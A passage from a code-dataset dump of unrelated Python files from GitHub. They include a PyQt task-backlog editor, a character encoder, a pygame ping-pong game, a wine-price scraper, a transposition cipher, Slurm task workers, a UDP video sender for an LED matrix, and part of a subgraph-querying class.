self.prjCodeInputErr.setVisible(False)\n\n self.updateTaskFromLineEdits(self.currTask)\n\n self.updateTextRowListView(prevRowSelected, self.currTask.title)\n\n self.updateCurrTaskSelected()\n\n def updateCurrTaskSelected(self):\n\n tasks = self.tempoBacklog.tasks\n\n if self.currRowSelected >= 0 and self.currRowSelected < len(tasks):\n self.currTask = tasks[self.currRowSelected]\n else:\n self.currTask = Task()\n\n self.updateCurrTaskLineEdits()\n\n def updateCurrTaskLineEdits(self):\n\n self.titleInput.setText(self.currTask.title)\n self.prjCodeInput.setText(self.currTask.prjCode)\n\n compTime = str(timedelta(seconds = self.currTask.completedTime))\n self.completedTime.setText(compTime)\n\n estimatedTime = str(timedelta(seconds = self.currTask.estimatedTime))\n self.estimatedTime.setText(estimatedTime)\n\n self.percAccomplished = str(self.currTask.completionRatio)\n\n def initListViewOfTasks(self):\n\n self.listTasksView.clear()\n\n for currTask in self.tempoBacklog.tasks:\n \n self.listTasksView.addItem(currTask.title)\n\n self.currRowSelected = 0\n self.listTasksView.setCurrentRow(self.currRowSelected)\n\n self.listTasksView.itemSelectionChanged.connect(self.manageCurrRowChangeList)\n \n def manageAddTaskClickedButton(self):\n\n self.listState = State.ADDING_TASK\n\n self.newItemEnum += 1\n \n self.listTasksView.addItem('New Item {}'.format(str(self.newItemEnum)))\n\n lastRowListView = self.listTasksView.count() - 1\n self.listTasksView.setCurrentRow(lastRowListView)\n\n self.tempoBacklog.addTask(Task())\n\n self.updateCurrTaskSelected()\n\n self.listState = State.SELECT_TASK\n\n def manageDeleteTaskClickedButton(self):\n\n self.newItemEnum -= 1\n\n self.listState = State.DELETE_TASK\n\n self.listTasksView.takeItem(self.currRowSelected)\n \n self.currRowSelected = self.listTasksView.currentRow()\n\n countListItems = self.listTasksView.count()\n\n if countListItems >= 0:\n\n self.tempoBacklog.deleteTask(self.currTask)\n\n self.updateCurrTaskSelected()\n\n self.listState = State.SELECT_TASK\n\n def updateTaskFromLineEdits(self, iTask):\n \n iTask.title = self.titleInput.text()\n iTask.prjCode = self.prjCodeInput.text()\n\n iTask.setCompletedTime(self.completedTime.text())\n iTask.setEstimatedTime(self.estimatedTime.text())\n\n def closeEvent(self, event):\n\n self.reject()\n\n def accept(self):\n\n self.updateTaskFromLineEdits(self.tempoTask)\n\n isTaskNotValid = self.backlog.validateTask(self.tempoTask)\n\n if len(isTaskNotValid):\n\n self.invalidTaskErrMsg.exec()\n self.titleInputErr.setVisible(True)\n self.prjCodeInputErr.setVisible(True)\n return\n \n else:\n self.updateTaskFromLineEdits(self.currTask)\n\n self.close()\n\n def updateTextRowListView(self, iRow, iTaskTitle):\n\n item = self.listTasksView.item(iRow)\n item.setText(iTaskTitle)\n\n","repo_name":"patrick-deschambault/turboClock","sub_path":"EditBacklogGUI.py","file_name":"EditBacklogGUI.py","file_ext":"py","file_size_in_byte":8350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14761424516","text":"import string as _string\n\nimport numpy as _np\n\n\n\"\"\"\nQuasi-One Hot representation of characters.\n\"\"\"\n# this is what will mark a 'token boundary'\nnew_token_char = '\\n'\n\n# one hot dims for common classes\n_string_feature_names = ['ascii_lowercase', 'digits', 'punctuation',\n 'whitespace']\n\n# extra dims: is-uppercase, is-digit, is-punctutation, is-whitespace,\n# new token char, unknown char\n_other_feature_names = ['is_uppercase', 'is_digit', 'is_punctuation',\n 'is_whitespace', 'is_new_token_char', 'unknown']\n\n_feature_string = ''.join(\n [getattr(_string, feature_name) for feature_name in\n _string_feature_names] +\n [' ' for _ in _other_feature_names])\n\nfeature_length = len(_feature_string)\n\nfeature_names = ([\"string.\"+_str_feat_name+\"-\"+_str\n for _str_feat_name in _string_feature_names\n for _str in getattr(_string, _str_feat_name)]\n +\n _other_feature_names)\n\n\ndef _encode_char(char):\n \"\"\"\n Returns the quasi-one-hot index vector for a character.\n - alpha-characters are mapped to lower-case one-hot + 'is-uppercase'\n - digits are mapped to one-hot + 'is-digit'\n - punctuation marks are mapped to one-hot + 'is-punctuation'\n - whitespace (ecxept '\\n') characters are mapped to one-hot +\n 'is-whitespace'\n - unknowns have their own one-hot\n * '\\n' is treated as new-token-character\n\n Args:\n char: string\n Character to index\n\n Returns:\n index : np.ndarray, dtype=bool, shape=(~106,1)\n Index vector of character\n \"\"\"\n # make sure to process a single character\n if len(char) > 1:\n raise ValueError('can only cope with a single char.')\n\n index = _np.zeros((1, feature_length)).astype(bool)\n\n if (char.lower() in _feature_string[0:-len(_other_feature_names)]\n or char in _string.ascii_uppercase):\n index[0, _feature_string.index(char.lower())] = True\n else:\n index[0, feature_length-1] = True\n\n if char in _string.ascii_uppercase:\n index[0, feature_length-6] = True\n elif char in _string.digits:\n index[0, feature_length-5] = True\n elif char in _string.punctuation:\n index[0, feature_length-4] = True\n elif char in _string.whitespace or char == new_token_char:\n if char == new_token_char:\n index[0, feature_length-2] = True\n else:\n index[0, feature_length-3] = True\n\n return index\n\n\ndef _decode_matrix(matrix):\n \"\"\"\n Inverse of _encode().\n\n Args:\n index: np.ndarray, dtype=bool, shape=(~100,1)\n Index vector of character\n\n Returns:\n char: string\n Character of index\n\n \"\"\"\n chars = ''\n matrix = matrix.T\n for row in matrix:\n if row[feature_length-1]:\n char = '?'\n elif row[feature_length-2]:\n char = '\\n'\n else:\n char = _feature_string[row.tolist().index(True)]\n if row[feature_length-6]:\n char = char.upper()\n chars = ''.join(chars+char)\n return chars\n\n\ndef encode(chars):\n \"\"\"\n Converts chars to the quasi-one-hot matrix representation.\n\n Returns:\n quasi one-hot matrix of chars\n np.ndarray, dtype=bool, shape=(len(chars),feature_length)\n \"\"\"\n matrix = _np.zeros((len(chars), feature_length)).astype(bool)\n for rdx in range(len(chars)):\n matrix[rdx, ] = _encode_char(chars[rdx])\n return matrix.T\n\n\ndef decode(matrix):\n \"\"\"\n Convert matrix to the corresponding character representation.\n\n Returns:\n chars representation of matrix.\n \"\"\"\n return _decode_matrix(matrix)\n","repo_name":"bot-zen/tagger","sub_path":"tagger/representation/qonehotchars.py","file_name":"qonehotchars.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"28129218119","text":"from pygame import *\r\n\r\nwindow = display.set_mode((700,500))\r\nbackground = transform.scale(image.load('background.jpg'),(700,500))\r\ndisplay.set_caption('Пінг Понг')\r\n\r\nclass GameSprite(sprite.Sprite):\r\n\r\n def __init__(self,photo,rect_x,rect_y,speed,weight,height):\r\n super().__init__()\r\n self.weight = weight\r\n self.height = height\r\n self.image = transform.scale(image.load(photo),(self.weight,self.height))\r\n self.speed = speed\r\n self.rect = self.image.get_rect()\r\n self.rect.x = rect_x\r\n self.rect.y = rect_y\r\n\r\n def reset(self):\r\n window.blit(self.image,(self.rect.x,self.rect.y))\r\nclass Racket(GameSprite):\r\n def update_l(self):\r\n key_pressed = key.get_pressed()\r\n if key_pressed[K_w] and self.rect.y > 0:\r\n self.rect.y -= self.speed\r\n if key_pressed[K_s] and self.rect.y < 350:\r\n self.rect.y += self.speed\r\n def update_r(self):\r\n key_pressed = key.get_pressed()\r\n if key_pressed[K_UP] and self.rect.y > 0:\r\n self.rect.y -= self.speed\r\n if key_pressed[K_DOWN] and self.rect.y < 350:\r\n self.rect.y += self.speed\r\nclass Ball(GameSprite):\r\n\r\n def __init__(self,photo,rect_x,rect_y,speed,weight,height):\r\n super().__init__(photo,rect_x,rect_y,speed,weight,height)\r\n self.speed_x = speed\r\n self.speed_y = speed\r\n\r\n def update_ball(self):\r\n \r\n self.rect.y += self.speed_y\r\n self.rect.x += self.speed_x\r\n if self.rect.y > 450 or self.rect.y < 0:\r\n self.speed_y *= -1\r\n if self.rect.x > 650 or self.rect.x < 0:\r\n self.speed_x *= -1\r\n if sprite.collide_rect(racket_1,ball) or sprite.collide_rect(racket_2,ball):\r\n self.speed_x *= -1\r\n def set_to_start(self):\r\n\r\n ball.rect.x , ball.rect.y = 350,250\r\n racket_1.x , racket_1.y = 0, 0\r\n racket_2.x , racket_2.y = 650, 0\r\n \r\n\r\nclass MenuButton(sprite.Sprite):\r\n def __init__(self,photo,rect_x,rect_y,weight,height): \r\n super().__init__()\r\n self.weight = weight\r\n self.height = height\r\n self.image = transform.scale(image.load(photo),(self.weight,self.height))\r\n self.rect = self.image.get_rect()\r\n self.rect.x = rect_x\r\n self.rect.y = rect_y\r\n def reset(self):\r\n window.blit(self.image,(self.rect.x,self.rect.y))\r\n def collidepoint(self,x,y):\r\n return self.rect.collidepoint(x,y)\r\n def show_buttons(self):\r\n play_button.reset()\r\n replay_button.reset()\r\n exit_button.reset()\r\n\r\n\r\n\r\nracket_2 = Racket('rackk.png',650,0,7,50,150)\r\nracket_1 = Racket('rackk.png',0,0,7,50,150)\r\nball = Ball('balls.png',350,400,10,50,40)\r\nplay_button = MenuButton('play.png',240,100,250,70)\r\nreplay_button = MenuButton('replay.png',240,220,250,70)\r\nexit_button = MenuButton('exit.png',240,340,250,70)\r\nteam1 = 0\r\nteam2 = 0\r\nclock = time.Clock()\r\nFPS = 30\r\nfinish = True\r\ngame = True\r\n\r\nfont.init()\r\nfont2 = font.Font(None,72)\r\nfont1 = font.Font(None,36)\r\ntext_win1 = font2.render('PLAYER 1 WIN!',1,(255,215,0))\r\ntext_win2 = font2.render('PLAYER 2 WIN!',1,(255,215,0))\r\n\r\nwhile game:\r\n \r\n for i in event.get():\r\n if i.type == QUIT:\r\n game = False\r\n if i.type == MOUSEBUTTONDOWN and i.button == 1:\r\n x,y = i.pos\r\n if play_button.collidepoint(x,y):\r\n finish = False\r\n if replay_button.collidepoint(x,y):\r\n ball.set_to_start()\r\n team1 , team2 = 0,0\r\n finish = False\r\n\r\n if exit_button.collidepoint(x,y):\r\n game = False\r\n if i.type == KEYDOWN:\r\n if i.key == K_ESCAPE:\r\n if finish == True:\r\n finish = False\r\n elif finish == False:\r\n finish = True\r\n if i.key == K_r:\r\n ball.rect.x , ball.rect.y = 100,100\r\n racket_1.x , racket_1.y = 0, 0\r\n racket_2.x , racket_2.y = 650, 0\r\n finish = False\r\n if i.key == K_SPACE:\r\n finish = False\r\n\r\n if finish != True:\r\n window.blit(background,(0,0))\r\n racket_1.update_l()\r\n racket_2.update_r()\r\n ball.update_ball()\r\n\r\n number2 = font1.render('points:'+str(team2),1,(0,0,0))\r\n number1 = font1.render('points:'+str(team1),1,(0,0,0))\r\n racket_1.reset()\r\n racket_2.reset()\r\n ball.reset()\r\n window.blit(number1,(40,50))\r\n window.blit(number2,(560,50))\r\n\r\n if ball.rect.x < 0:\r\n team2 += 1\r\n if ball.rect.x > 650:\r\n team1 += 1\r\n if team2 == 5:\r\n window.blit(text_win2,(200,50))\r\n finish = True \r\n if team1 == 5:\r\n window.blit(text_win1,(200,50))\r\n finish = True\r\n else :\r\n\r\n play_button.reset()\r\n replay_button.reset()\r\n exit_button.reset()\r\n\r\n clock.tick(FPS)\r\n display.update()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"vrashaVer/ping-pong","sub_path":"ping.pong.py","file_name":"ping.pong.py","file_ext":"py","file_size_in_byte":5067,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8269553367","text":"from abc import ABC, abstractmethod\n\n\nclass DataBase_Object(ABC):\n \"\"\"\n This is an abstract class that must be inherited by any object that is being uploaded into a MySQL server\n using the sql_connection class\n \"\"\"\n\n fields_to_compress = [] # The fields of the object that need to be compressed\n table: str = '' # The table the object will be uploaded too\n primary_key: str = '' # the primary key of the object and table\n field_to_increment: str = None # If the object is being accessed and this needs to be tracked - this is the field\n unchanging_fields = []\n\n @abstractmethod\n def database_dict(self):\n \"\"\"\n This method must be implemented by any object inherting from DataBase Object\n It should return a dictionary with the values as strings of the database field names, and values as the\n values to be uploaded (types need to be correct). This dictionary should be in the same order as the \n table.\n :return: dict(string, value)\n \"\"\"\n raise NotImplementedError(\n \"Override this method in your class so it returns a dictionary with keys identical to the database\")\n\n def not_none(self, item):\n \"\"\"\n Checks if an item is an empty string, returning true if it is not.\n :param item: the string item to be checked\n :return: bool\n \"\"\"\n if str(item) == '':\n return False\n return True\n\n @staticmethod\n def normalize_for_varchar(word: str):\n \"\"\"\n Takes a value and normalizes it so it can be uploaded for a varchar \n :param str: The string value that will be held in mySQL as a varchar\n :return: \n \"\"\"\n string = str(word)\n return string.encode('utf-8', 'ignore').decode('utf-8').replace(\"'\", '')\n\n @abstractmethod\n def unique_where(self):\n \"\"\"\n Returns a MySQL string that is able to identify if the object is unique. All non key string values - VARCHAR \n values in mySQL - must be surrounded in /' characters. Do not include 'WHERE' or a preceding space in this\n string\n \n Ex: \n return f\"objects_unique_identifier_instance_variable_name='{corresponding_string_value}'\"\n :return: \n \"\"\"\n raise NotImplementedError(\n \"Override this method in your class so it returns a dictionary with keys identical to the database\")\n\n @staticmethod\n def from_database_json(JSON_dict):\n \"\"\"\n Returns an object based off database values\n\n Ex: \n car_JSON_data = connection_object.get_listings('Cars')[0]\n car_object = Car.from_database_json(car_JSON_data_\n :param JSON_dict: Dict representing database object\n :return: \n \"\"\"\n raise NotImplementedError(\n \"Override this method in your class so it returns a dictionary with keys identical to the database\")\n\n @staticmethod\n def generic_self():\n \"\"\"\n Returns a generic version of the object for testing.\n EX:\n generic_class_object = ClassName.generic_self()\n :return: generic database_object\n \"\"\"\n raise NotImplementedError(\n \"Override this method in your class so it returns a dictionary with keys identical to the database\")\n\n\n @staticmethod\n def real_self(sql_connection):\n \"\"\"\n Returns a an object with real values from the database for testing\n \n EX:\n real_database_data_object = ClassName.real_self()\n :return: \n \"\"\"\n raise NotImplementedError(\n \"Override this method in your class so it returns a dictionary with keys identical to the database\")\n\n\n","repo_name":"SpencerPinegar/Ad-Board-Scraper-Analyzer","sub_path":"Messenger_Pigeon/Objects/Database_Objects/database_object.py","file_name":"database_object.py","file_ext":"py","file_size_in_byte":3773,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"44056452630","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 13 15:30:49 2018\n\n@author: Kevin\n\"\"\"\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport csv\nimport datetime\n\n\"\"\"\nRed wine url: \n Category: Red wine (to exclude rose)\n Rating 4, 4.5 or 5. \n Dan Murphy's (not Connections). \n Price 5 - 30.\n\"\"\"\nsource = requests.get('https://www.danmurphys.com.au/dm/navigation/navigation'\n '_results_gallery.jsp?params=fh_location%3D%2F%2Fcatalo'\n 'g01%2Fen_AU%2Fcategories%3C%7Bcatalog01_25343743020259'\n '14%7D%2F5.0%3Cprice%3C30.0%2Fwebmaincategory%3E%7Bred2'\n '0wine%7D%2Fweb_dsv_flag%3E%7Bdan20murphy27s%7D%2Fbv_cu'\n 'stomer_ratings%3E%7B40%3B45%3B50%7D%26fh_view_size%3D1'\n '20%26fh_sort%3D-sales_value_30_days%26fh_modification%'\n '3D%2528secondid%253C%257Bdm_b999999000632%257D%252Cblo'\n 'cked%2529%252C%2528secondid%253C%257Bdm_mystery57%257D'\n '%252Cblocked%2529%252C%2528secondid%253C%257Bdm_myster'\n 'y52%257D%252Cblocked%2529%252C%2528secondid%253C%257Bd'\n 'm_757646%257D%252Cblocked%2529%252C%2528secondid%253C%'\n '257Bdm_610528%257D%252Cblocked%2529%252C%2528secondid%'\n '253C%257Bdm_786481%257D%252Cblocked%2529%252C%2528seco'\n 'ndid%253C%257Bdm_616722%257D%252Cblocked%2529%252C%252'\n '8instock%253D0%252Cbottom%2529&resetnav=false&storeExc'\n 'lusivePage=false').text\n\nsoup = BeautifulSoup(source, 'lxml')\n\n# \"today\" is the col name of the new col to be added to the existing df.\nnow = datetime.datetime.now()\ntoday = str(now.strftime(\"%Y-%m-%d\"))\n\ncsv_file = open('{}.csv'.format(today), 'w', newline = '') \n\ncsv_writer = csv.writer(csv_file)\ncsv_writer.writerow(['product_name', today])\n\nfor product in soup.find_all('div', {'class':'independent-product-module'}):\n product_name = product.div.h2.a['title']\n # Replace Frech letters with English\n translationTable = str.maketrans(\"éàèùâêîôóûç\", \"eaeuaeioouc\")\n product_name = product_name.translate(translationTable)\n try:\n price = product.find_all('li', {'class':'price-secondary'})[0]\\\n .p.span.text\n except IndexError:\n price = product.find_all('span',{'class':'price'})[0].text\n price = price.replace('$','')\n csv_writer.writerow([product_name, price])\n \ncsv_file.close()\n \n \n \n \n \n \n ","repo_name":"kanru-wang/web_scraping","sub_path":"web_scraping_prototype_dan.py","file_name":"web_scraping_prototype_dan.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35941669447","text":"import math\nimport pyperclip\n\n\ndef main():\n text = '''Charles Babbage, FRS (26 December 1791 - 18 October 1871) was an English\nmathematician, philosopher, inventor and mechanical engineer who originated the\nconcept of a programmable computer. Considered a \"father of the computer\",\nBabbage is credited with inventing the first mechanical computer that\neventually led to more complex designs. Parts of his uncompleted mechanisms are\non display in the London Science Museum. In 1991, a perfectly functioning\ndifference engine was constructed from Babbage's original plans. Built to\ntolerances achievable in the 19th century, the success of the finished engine\nindicated that Babbage's machine would have worked. Nine years later, the\nScience Museum completed the printer Babbage had designed for the difference\nengine.'''\n print(len(text))\n encrypted_text = encrypt_message(text, 6)\n print(encrypted_text + '|')\n print('\\n' + decrypt_message(encrypted_text, 6) + '|')\n pyperclip.copy(encrypted_text)\n\n\ndef encrypt_message(message, key):\n message = message.upper()\n ciphertext = [''] * key\n for col_number in range(key):\n pointer = col_number\n while pointer < len(message):\n ciphertext[col_number] += message[pointer]\n pointer += key\n return ''.join(ciphertext)\n\ndef decrypt_message(ciphertext, key):\n ciphertext = ciphertext.upper()\n num_of_rows = key\n num_of_columns = math.ceil(len(ciphertext) / key)\n num_of_unused_boxes = num_of_rows * num_of_columns - len(ciphertext)\n plaintext = [''] * num_of_columns\n column = 0\n row = 0\n for symbol in ciphertext:\n plaintext[column] += symbol\n column += 1\n if column == num_of_columns or (column == num_of_columns - 1 and row >=\n num_of_rows - num_of_unused_boxes):\n column = 0\n row += 1\n return ''.join(plaintext)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"KrolMateusz/Crypto","sub_path":"Alghoritms/transposition_cipher.py","file_name":"transposition_cipher.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42377556459","text":"from gi.repository import Gtk, Gio\n\nfrom .window import MainWindow\n\n\nclass GHueApplication(Gtk.Application):\n def __init__(self, controller):\n super(GHueApplication, self).__init__(application_id=\"com.github.alexsdutton.gnome_hue\",\n flags=Gio.ApplicationFlags.FLAGS_NONE)\n self.controller = controller\n self.connect(\"activate\", self.on_activate)\n\n def on_activate(self, data=None):\n window = MainWindow(self.controller)\n window.connect('destroy-event', Gtk.main_quit)\n window.show_all()\n self.add_window(window)","repo_name":"alexdutton/gnome-hue","sub_path":"ghue/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"35205152972","text":"from collections import namedtuple\nimport copy\nimport rx\nimport dask\nimport sys\nimport os\nimport dxpy.slurm as slurm\nfrom ..model import task as taskpy\nfrom ..model import creators\nfrom .. import interface\n\nNB_THREADS = 5\nTHREAD_POOL = rx.concurrency.ThreadPoolScheduler(NB_THREADS)\n\n\nclass Workers:\n @classmethod\n def is_complete(cls, task, *args):\n return task.state == taskpy.State.Complete\n\n @classmethod\n def on_this_worker(cls, task):\n return task.worker == cls.WorkerType\n\n @classmethod\n def plan(cls, task):\n raise NotImplementedError\n\n @classmethod\n def run(cls, task, stdout=None, stderr=None):\n print('RUN CALLED with task')\n print(task)\n if stdout is None:\n stdout = sys.stdout\n if stderr is None:\n stderr = sys.stderr\n (rx.Observable.from_([task])\n .subscribe_on(THREAD_POOL)\n .map(cls.plan)\n .subscribe(on_next=lambda r: print(r, file=stdout),\n on_error=lambda e: print(e, file=stderr)))\n\n\nclass NoAction(Workers):\n WorkerType = taskpy.Worker.NoAction\n\n @classmethod\n def plan(cls, t, *args):\n print(\"NO ACTION PLAN CALLED\")\n t = interface.mark_start(t)\n t = interface.mark_complete(t)\n return 'NoAction of task id: {} done.'.format(t.id)\n\n\ndef sbatch_command(workdir, file):\n cmd = 'cd {0}'.format(workdir)\n if file is not None:\n cmd += ' && sbatch {0}'.format(file)\n return cmd\n\n\ndef normal_command(workdir, command):\n return 'cd {0} && {1}'.format(workdir, command)\n\n\nclass Slurm(Workers):\n WorkerType = taskpy.Worker.Slurm\n\n @classmethod\n def is_complete(cls, task, *args):\n return slurm.is_complete(task.data.get('sid'))\n\n @classmethod\n def plan(cls, task, *args):\n # why?\n # TODO: FIX\n # print(args)\n # raise ValueError('task {0}, args: {1}'.format(task, args))\n # def srun_command(workdir, command):\n # return 'cd {0} && srun {1}'.format(workdir, command)\n\n task = interface.mark_start(task)\n\n # if isinstance(task, templates.TaskCommand):\n # command = task.command(srun_command)\n if not task.type == taskpy.Type.Script:\n raise TypeError(\n 'Slurm worker only support TaskScript tasks, got: {!r}.'.format(task))\n command = sbatch_command(task.workdir, task.data.get('file'))\n with os.popen(command) as fin:\n result = fin.readlines()[0]\n sid = slurm.sid_from_submit(result)\n task.data.update({'sid': sid})\n interface.update(task)\n return result\n\n\nclass MultiThreding(Workers):\n WorkerType = taskpy.Worker.MultiThreading\n\n @classmethod\n def plan(cls, task):\n # TRT = namedtuple('TaskResultTuple', ('task', 'res'))\n task = interface.mark_start(task)\n if task.type == taskpy.Type.Command:\n with os.popen(normal_command(task.workdir, task.data['command'])) as fin:\n result = fin.readlines()\n task = interface.mark_complete(task)\n return result\n\n\nWORKERS = [NoAction, MultiThreding, Slurm]\n\n\ndef get_workers(task):\n for w in WORKERS:\n if w.on_this_worker(task):\n return w\n\n# class Dask(Workers):\n# WorkerType = taskpy.Worker.Dask\n# NB_PROCESSES = 5\n\n# @classmethod\n# def run_plan(cls, task):\n# (rx.Observable.just(task.workers.num_workers)\n# .map(lambda i: dask.delayed(task.run)(i_worker=i))\n# .to_list()\n# .map(lambda l: dask.bag.from_delayed(l))\n# .map(lambda b: b.compute(num_workers=NB_PROCESSES)))\n","repo_name":"Hong-Xiang/dxl","sub_path":"dxpy/dxpy/task/run/workers.py","file_name":"workers.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24954173527","text":"\"\"\"\nVideoSender\n\n\"\"\"\nimport socket\nimport time\nimport cv2\nfrom PIL import Image\nimport numpy as np\nimport sys\n\n\n\nHOST = \"IP address reported by VideoReceiver.py\" # server IP address\nPORT = 8000 # server port\n\nMATRIX_X,MATRIX_Y=64,32\t# the size of the Waveshare matrix\n\nDEBUG=False\nDEFAULT_FPS=27\n\nSOURCE=\"Your MP4 video\"\n\n\nserverSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n\n# check the source file exists\ntry:\n # just try to open the video\n with open(SOURCE) as fp:\n print(f\"Source {SOURCE} exists\")\n\nexcept Exception as e:\n print(f\"Unable to open {SOURCE}. Error was {e}.Quitting\")\n sys.exit(0)\n\nvid=cv2.VideoCapture(SOURCE)\n\n\n# LED colour correction factors\ngain_r=1.0\ngain_g=0.8\ngain_b=0.5\n\n# work out aspect ratio using first frame\n\n(grabbed, frame) = vid.read()\nframe_h,frame_w=frame.shape[:2]\n\nASPECT_RATIO=frame_h/frame_w\n\nX_SIZE = int(MATRIX_X * ASPECT_RATIO)\nY_SIZE = int(MATRIX_Y * ASPECT_RATIO)\nDSIZE = (X_SIZE, Y_SIZE) # scaling sizes to reduce the frame to fit the matrix\nX_OFF = int((MATRIX_X - X_SIZE) / 2) # offsets for placing the frame in the matrix\nY_OFF = int((MATRIX_Y - Y_SIZE) / 2)\n\nimage_data = np.zeros((MATRIX_Y, MATRIX_X), dtype=np.uint16) # the output frame\n\nprint(f\"frame_h {frame_h} frame_w {frame_w} aspect {ASPECT_RATIO}\")\n\n# work out the video frame rate\n# Find OpenCV version\n(major_ver, minor_ver, subminor_ver) = (cv2.__version__).split('.')\nFPS=DEFAULT_FPS\nif int(major_ver) < 3 :\n FPS = vid.get(cv2.cv.CV_CAP_PROP_FPS)\n print(f\"Frames per second using video.get(cv2.cv.CV_CAP_PROP_FPS): {FPS}\")\nelse :\n FPS = vid.get(cv2.CAP_PROP_FPS)\n print(f\"Frames per second using video.get(cv2.CAP_PROP_FPS) : {FPS}\")\n\nFRAMETIME=1.0/FPS\n\nframe_count=0\n\n#########################################################\nwhile True:\n frame_start = time.monotonic()\n (grabbed, frame) = vid.read()\n\n if not grabbed:\n logit(\"Frame not grabbed from source! End of video?\")\n serverSocket.close()\n break\n\n if DEBUG:\n cv2.imshow(\"frame\",frame)\n cv2.waitKey(0)\n\n # reduce image keeping aspect ratio\n res = cv2.resize(frame, dsize=DSIZE, interpolation=cv2.INTER_CUBIC)\n\n # colour correction required for LED matrix\n res[:,:,0]=np.minimum(res[:,:,0]*gain_r,255)\n res[:,:,1]=np.minimum(res[:,:,1]*gain_g,255)\n res[:,:,2]=np.minimum(res[:,:,2]*gain_b,255)\n\n # convert to RGB565\n R5 = (res[..., 0] >> 3).astype(np.uint16) << 11\n G6 = (res[..., 1] >> 2).astype(np.uint16) << 5\n B5 = (res[..., 2] >> 3).astype(np.uint16)\n\n # Assemble components into RGB565 uint16 image\n RGB565 = R5 | G6 | B5\n\n # paste the image into the matrix shape\n image_data[Y_OFF:Y_OFF+Y_SIZE,X_OFF:X_OFF+X_SIZE]=RGB565 # default aspect ratio 1:1\n\n # flatten the image into a 1D array of bytes\n flat=image_data.flatten()\n frame_bytes=flat.tobytes()\n bytes_sent = serverSocket.sendto(frame_bytes, (HOST, PORT))\n\n #print(f\"Sent {bytes_sent}\")\n cv2.imshow(\"frame\", image_data)\n cv2.waitKey(1)\n # don't send too fast otherwise we get a Laurel and Hardy film\n while (time.monotonic() - frame_start) < FRAMETIME:\n pass\n\n","repo_name":"BNNorman/Pico_W_RGBMATRIX_VideoPlayer","sub_path":"VideoSender.py","file_name":"VideoSender.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22531422335","text":"import json\nfrom abc import ABC\nfrom enum import Enum, auto\nfrom typing import Any, Dict, Generator, Iterator, List, Optional, Tuple, cast\n\nfrom web3 import Web3\n\nfrom packages.valory.skills.abstract_round_abci.behaviour_utils import BaseBehaviour\nfrom packages.valory.skills.abstract_round_abci.models import ApiSpecs\nfrom packages.valory.skills.market_manager_abci.graph_tooling.queries.conditional_tokens import (\n user_positions as user_positions_query,\n)\nfrom packages.valory.skills.market_manager_abci.graph_tooling.queries.network import (\n block_number,\n)\nfrom packages.valory.skills.market_manager_abci.graph_tooling.queries.omen import (\n questions,\n trades,\n)\nfrom packages.valory.skills.market_manager_abci.graph_tooling.queries.realitio import (\n answers as answers_query,\n)\nfrom packages.valory.skills.market_manager_abci.graph_tooling.queries.trades import (\n trades as trades_query,\n)\nfrom packages.valory.skills.market_manager_abci.models import (\n MarketManagerParams,\n SharedState,\n)\nfrom packages.valory.skills.market_manager_abci.rounds import SynchronizedData\n\n\nQUERY_BATCH_SIZE = 1000\n\n\ndef to_content(query: str) -> bytes:\n \"\"\"Convert the given query string to payload content, i.e., add it under a `queries` key and convert it to bytes.\"\"\"\n finalized_query = {\"query\": query}\n encoded_query = json.dumps(finalized_query, sort_keys=True).encode(\"utf-8\")\n\n return encoded_query\n\n\ndef to_graphql_list(li: list) -> str:\n \"\"\"Convert the given list to a string representing a list for a GraphQL query.\"\"\"\n return repr(li).replace(\"'\", '\"')\n\n\nclass FetchStatus(Enum):\n \"\"\"The status of a fetch operation.\"\"\"\n\n SUCCESS = auto()\n IN_PROGRESS = auto()\n FAIL = auto()\n NONE = auto()\n\n\nclass QueryingBehaviour(BaseBehaviour, ABC):\n \"\"\"Abstract behaviour that implements subgraph querying functionality.\"\"\"\n\n def __init__(self, **kwargs: Any) -> None:\n \"\"\"Initialize a querying behaviour.\"\"\"\n super().__init__(**kwargs)\n self._call_failed: bool = False\n self._fetch_status: FetchStatus = FetchStatus.NONE\n self._creators_iterator: Iterator[\n Tuple[str, List[str]]\n ] = self.params.creators_iterator\n self._current_market: str = \"\"\n self._current_creators: List[str] = []\n\n @property\n def params(self) -> MarketManagerParams:\n \"\"\"Get the params.\"\"\"\n return cast(MarketManagerParams, self.context.params)\n\n @property\n def shared_state(self) -> SharedState:\n \"\"\"Get the shared state.\"\"\"\n return cast(SharedState, self.context.state)\n\n @property\n def synchronized_data(self) -> SynchronizedData:\n \"\"\"Return the synchronized data.\"\"\"\n return cast(SynchronizedData, super().synchronized_data)\n\n @property\n def synced_time(self) -> int:\n \"\"\"Get the synchronized time among agents.\"\"\"\n synced_time = self.shared_state.round_sequence.last_round_transition_timestamp\n return int(synced_time.timestamp())\n\n @property\n def current_subgraph(self) -> ApiSpecs:\n \"\"\"Get a subgraph by prediction market's name.\"\"\"\n return getattr(self.context, self._current_market)\n\n def _prepare_fetching(self) -> bool:\n \"\"\"Prepare for fetching a bet.\"\"\"\n if self._fetch_status in (FetchStatus.SUCCESS, FetchStatus.NONE):\n res = next(self._creators_iterator, None)\n if res is None:\n return False\n self._current_market, self._current_creators = res\n\n if self._fetch_status == 